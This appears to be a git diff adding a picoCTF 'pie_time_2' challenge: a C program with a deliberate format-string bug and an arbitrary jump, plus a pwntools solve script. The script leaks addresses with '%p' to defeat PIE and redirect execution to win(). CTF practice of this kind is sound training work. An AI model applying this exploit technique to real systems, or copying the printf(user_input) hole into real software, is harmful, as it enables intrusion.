diff --git a/pwn/pie_time_2/flag.txt b/pwn/pie_time_2/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/pie_time_2/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/pie_time_2/solve.py b/pwn/pie_time_2/solve.py new file mode 100755 index 0000000..df03cd2 --- /dev/null +++ b/pwn/pie_time_2/solve.py @@ -0,0 +1,44 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split() + +def conn() -> remote: + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + # gdb.attach(r, gdbscript=''' + # info proc mappings + # c + # ''') + + # Calculated by inspecting the output - the reported binary start address from gdb + leak_offset = 0x1441 + + r.recvuntil(b'Enter your name:').decode() + r.sendline(b'%p\t'*20) + leaks = r.recvline().strip().decode().split('\t') + base_leak = leaks[18] + exe.address = int(base_leak[2:], 16) - leak_offset + print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}") + + print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode()) + r.sendline(hex(exe.symbols['win'])) + print(r.recvall().decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/pie_time_2/vuln b/pwn/pie_time_2/vuln new file mode 100755 index 0000000..058a207 Binary files /dev/null and b/pwn/pie_time_2/vuln differ diff --git a/pwn/pie_time_2/vuln.c b/pwn/pie_time_2/vuln.c new file mode 100644 index 0000000..51b81dd --- /dev/null +++ b/pwn/pie_time_2/vuln.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include + +void segfault_handler() { + printf("Segfault Occurred, incorrect address.\n"); + exit(0); +} + +void call_functions() { + char buffer[64]; + printf("Enter your name:"); + fgets(buffer, 64, stdin); + printf(buffer); + + unsigned long val; + printf(" enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + + void (*foo)(void) = (void (*)())val; + foo(); +} + +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + + call_functions(); + return 0; +} \ No newline at end of file